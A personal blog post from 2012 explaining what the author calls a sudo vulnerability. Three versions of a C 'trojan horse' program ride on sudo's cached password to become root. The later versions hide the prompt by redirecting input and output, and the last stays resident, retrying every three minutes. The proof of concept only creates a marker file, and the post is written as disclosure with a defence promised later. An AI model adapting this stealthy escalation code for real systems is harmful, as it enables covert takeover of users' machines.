Jonathan Fabrizio
NEWS
Recent Articles
Use recent version of OpenGL on older machines (using soft pipeline)
How to interpret RAW Bayer data from the PiCam HQ
HP LaserJet 1020 connection over network
Hijack SUDO
SUDO vulnerability (2/2)
 
Research
Publications
Text Localization
Video compression
Perspective-N-Points
Catadioptric sensor calibration
All
 
Teaching
Théorie des lang.
Théorie des lang. Rat.
Trait. des images
Synthèse d'images / OpenGL 4
All
 
Blog
Security (3 )
Tips (4 )
Non classé (0)
All posts (7 )
 
Other
Connexion
Links
CV - About me
Copyright © 2011 Jonathan Fabrizio
Theme inspiré du thème piano-black réalisé par mono-lab.
Visitor

SUDO vulnerability (1/2)

Jonathan Fabrizio - 08/01/12

Allowing sudo to avoid asking password for executing admin operation disrupts me a bit. I think it is a vulnerability and I will try to prove it in this post. This is not a big threat as this implies the system has already be corrupted but this should not be neglected: I think a simple program can easily become root with this mechanism. Most of this post has been written after an old long discussion on french ubuntu forum but I hesitated long time to publish it.

The context

First of all we have is a major program that perform critical admin operations: 


/*
admin_op.c
@author Jonathan Fabrizio
@date 06/01/12
*/
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
  if (getuid()==0) 
    printf("Ready to perform admin op\n");
  else
    printf("You must be root to perform this operation\n");
  return 0;
}

The content of this program is not important. It is simply a common program that need root privilige to perform admin operations.

To execute this program (obviously after compilation) you need to enter: 


sudo ./admin_op

The first time you enter this instruction, the system ask you your password. To this point, no trouble. But from now, if you call sudo again, your password will not be asked again (as long as your terminal has the same id and for a predefined period of time). It is not bad as it can be annoying to enter password again and again - right. This behaviour depends on configuration but for example, by default on ubuntu if think the password is not asked again for 15 min.

Exploit

Imagine a program, installed on your computer that suddunly want to became root. The simple operation he has to do is to check if it can became root: 


/*
trojan_horse_sudo_exploit.c
@author Jonathan Fabrizio
@date 06/01/12
@version 1.0
*/
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

void you_are_root(void) {
  //you win !
  //nobody know but your are root and you can prove it :
  FILE *f=fopen("/sudo_exploit.txt", "w");
  if (f!=NULL) fclose(f);
}

void try_to_become_root(void) {
  pid_t pid;
  if ( (pid=fork())==0 ) { 
    execlp("sudo", "sudo", "./trojan_horse_sudo_exploit", NULL, NULL);
    exit(0);
  } else if (pid>0) {
    int status;
    //do your normal job...
    while (waitpid(pid, &status, WNOHANG)==0);
  }
}

int main(int argc, char *argv[])
{
  if (getuid()==0) {
    you_are_root();
  } else {
    try_to_become_root();
  }
  return 0;
}

This is simple. If this program is call with root privilige, it will call you_are_root(). If not, it will try to re-execute itself by calling sudo. If the password has already been entered, it will be automatically executed with root privileges !

Is it really a threat? Not really: First this program must be invoked just after you call sudo. He has a very short period of time and second, if it is not in this period of time, the system will ask the password to the user and the trojan horse will be detected kickly!

Are we really safe? Is it possible to hide this trojan? Simply redirecting standard input and output will allow to hide to the user that sudo ask the password. Sudo immediatly terminate in error and the user do not see anything. 


/*
trojan_horse_sudo_exploit.c
@author Jonathan Fabrizio
@date 06/01/12
@version 2.0
*/
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

void you_are_root(void) {
  //you win !
  //nobody know but your are root and you can prove it :
  FILE *f=fopen("/sudo_exploit.txt", "w");
  if (f!=NULL) fclose(f);
}

void try_to_become_root(void) {
  pid_t pid;
  if ( (pid=fork())==0 ) { 
    freopen("/dev/null", "w", stderr);
    freopen("/dev/null", "r", stdin);
    setsid();
    execlp("sudo", "sudo", "./trojan_horse_sudo_exploit", NULL, NULL);
    exit(0);
  } else if (pid>0) {
    int status;
    //do your normal job...
    sleep(10);
    while (waitpid(pid, &status, WNOHANG)==0);
  }
}

int main(int argc, char *argv[])
{
  if (getuid()==0) {
    you_are_root();
  } else {
    try_to_become_root();
  }
  return 0;
}

It remains a simple problem now: This can only work just after sudo has been invoked. Ok the solution is to stay resident and wait... 


#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

void you_are_root(void) {
  //you win !
  //nobody know but your are root and you can prove it :
  FILE *f=fopen("/sudo_exploit.txt", "w");
  if (f!=NULL) fclose(f);
}

void try_to_become_root(void) {
  pid_t pid;
  int success=0;
  
  if ( (pid=fork())==0 ) { 
    freopen("/dev/null", "w", stderr);
    freopen("/dev/null", "r", stdin);
    setsid();
    do {
      pid_t pid_exploit;
      if ( (pid_exploit=fork())==0 ) {
	execlp("sudo", "sudo", "./trojan_horse_sudo_exploit", "1", NULL);
	exit(0);
      } else if (pid_exploit>0) {
	int status;
	FILE *f;
	while (waitpid(pid_exploit, &status, WNOHANG)==0);
	f=fopen("/sudo_exploit.txt", "r");
	if (f!=NULL) {
	  success=1; 
	  fclose(f);
	} else {
	  sleep(3*60);
	}
      }      
    } while (!success);
  }
}

int main(int argc, char *argv[])
{
  if (getuid()==0) {
    you_are_root();
  } else if (argc==1) {
    try_to_become_root();
  }
  return 0;
}

The program stays resident, waits and tries frequently to become root (every 3 minutes). It stops as soon as it succeeded. This means if you start the program that contains the trojan horse and you invoke sudo after in the same terminal, the trojan horse will become root. In the same terminal? Not really. If you invoke sudo and close your terminal. A newly opened terminal will may be affected by the id of the previously closed terminal and invocation of sudo wont ask you a password as if you were in the same terminal. Worst if it is graphical application, invoking a program that require root privilege by the graphical user interface may offer root privillege to any other application invoked by the graphical user interface...

Conclusion

We have seen it is possible to stealthy became root by the usage of sudo. The danger is rather poor as the trojan horse that use this vulnerability should be launched in the same terminal which is used for admin operation. However the trojan can became root even if sudo is invoked much later.

In a next post, I will show how it is possible to increase to chance to became root with this vulnerability. To conclude - and it is the most important - I will show how to protect our system against this vulnerability. 



Viewed 3854 times